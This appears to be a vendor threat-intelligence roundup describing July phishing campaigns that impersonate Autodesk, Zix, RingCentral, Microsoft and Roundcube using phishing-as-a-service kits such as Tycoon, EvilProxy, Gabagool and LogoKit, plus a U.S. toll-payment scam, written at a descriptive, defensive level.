During July, Barracuda threat analysts identified several notable email-based threats targeting organisations around the world. Many of them leveraged popular phishing-as-a-service (PhaaS) kits. The threats include:
- Tycoon PhaaS impersonating the Autodesk Construction Cloud for a credential phishing attack
- A fake toll violation scam targeting U.S.-based drivers
- Phishing emails mimicking the Zix Secure Message service
- EvilProxy attacks impersonating RingCentral
- Gabagool phishing kit exploiting business productivity tool with toxic PDF
- Phishing attacks bundling Copilot and SharePoint brands
- LogoKit credential theft attacks using Roundcube webmail service
- Tycoon links distributed as document downloads
Phishing attacks abusing Autodesk Construction Cloud
Threat Snapshot:
Barracuda’s threat analysts have seen attackers abusing the Autodesk Construction Cloud to deliver sophisticated phishing attacks. The Autodesk Construction Cloud is a set of online collaboration tools for people working on construction projects, from design and build to project management and budgeting.
In the attacks seen by Barracuda, attackers impersonate a trusted executive and send official-looking project notifications through Autodesk. The notifications lead recipients to an Autodesk-hosted page containing a seemingly harmless ZIP file.
The ZIP contains an HTML file that initiates the phishing attempt.
Opening the HTML file brings up a fake CAPTCHA verification screen — a common technique in phishing because it lends credibility to the attack and helps it bypass automated security detection. The user is then prompted to enter Microsoft login credentials on a convincingly spoofed page.
Attackers target U.S. road users with new toll scam
Threat Snapshot:
A new phishing scam is targeting U.S.-based drivers with fake notices about unpaid tolls. Victims receive urgent messages via text, email or phone calls, often appearing to come from legitimate toll agencies. These messages claim the recipient owes a fee and threaten account suspension or legal action if payment is not made immediately.
The messages contain links to fake websites that request sensitive data such as license plate numbers and credit card details. Fraudsters then harvest this information for financial gain or identity theft.
Tactics that include urgency and official branding pressure recipients to act without verifying the legitimacy of the message, making this scam highly effective.
Phishing campaign impersonating the Zix Secure Message Centre
Threat Snapshot:
This campaign mimics the Zix Secure Message Centre, an encrypted email service that is popular with organisations in healthcare, finance, legal and government sectors.
Victims receive an email about a supposed secure message, with a link to click to view it. The link takes users to a fake Zix page where they are asked to enter their email. They are then redirected to a fraudulent Microsoft login page designed to steal credentials.
The campaign is effective because it closely replicates Zix’s real workflows and branding, making it hard for recipients to spot the deception. Organisations using email encryption services like Zix and Microsoft 365 are particularly at risk.
EvilProxy fake voicemail attack spoofing RingCentral
Threat Snapshot:
Barracuda’s threat analysts have seen a sophisticated phishing attack using fake voicemail alerts to trick victims into entering their credentials on malicious sites.
Posing as RingCentral, a popular cloud-based business communications and collaboration platform, attackers send convincing emails about a ‘new voicemail,’ complete with personalised details. Clicking the play button initiates a series of redirections — starting with a trusted newsletter platform (Beehiiv), followed by legitimate cloud hosting (Linode), and finally a verification step on glitch.me.
These steps help the attack evade detection and add credibility. The destination is a phishing page using the EvilProxy PhaaS kit, designed to harvest Microsoft credentials, even bypassing common security checks. This multilayered approach makes the attack difficult to spot and highly effective.
In short
Gabagool phishing kit exploits business productivity tool with toxic PDFs
Threat Snapshot:
Gabagool is a sophisticated PhaaS kit known for its stealth and effectiveness and for targeting corporate and government employees with advanced credential-stealing tactics. Barracuda’s threat analysts have spotted attackers using Gabagool and the file-sharing functionality of the Notion.com business productivity tool to distribute malicious PDF files containing phishing links. The PDFs lead to phishing pages designed to steal user credentials. By leveraging a trusted platform and seemingly innocuous PDFs, attackers increase the chances of bypassing standard security controls.
Bundling Copilot and SharePoint brands for phishing
Threat Snapshot:
Cybercriminals are combining Microsoft SharePoint and Copilot branding in phishing schemes, crafting emails that look like genuine ‘Document shared’ alerts from internal or vendor accounts. These messages encourage recipients to click links leading to expertly spoofed Microsoft login pages. The campaign targets organisations that rely on Microsoft tools, aiming to harvest login credentials from unsuspecting employees.
LogoKit supports credential theft using Roundcube webmail service
Threat Snapshot:
This phishing campaign targets users of the Roundcube free open-source webmail client with fake password expiration alerts, warning that their passwords will expire in 48 hours unless action is taken. The message includes a link, supposedly to retain the current password, but it leads to a phishing site built using the LogoKit toolkit. Here, users are prompted to enter their credentials, which are then harvested by attackers.
Tycoon PhaaS link distributed as project document download
Threat Snapshot:
This phishing campaign circulates emails disguised as legitimate business documents, such as ‘Project Overview.pdf.’ Victims are enticed to click on download links, which redirect through several intermediate pages to mask the malicious intent, eventually landing on a Tycoon PhaaS-hosted phishing site. This modular and evasive strategy helps criminals bypass detection and increases the longevity of malicious URLs. The campaign targets business users accustomed to exchanging documents, making them more likely to trust and interact with the phishing links, resulting in stolen credentials and potential business compromise.
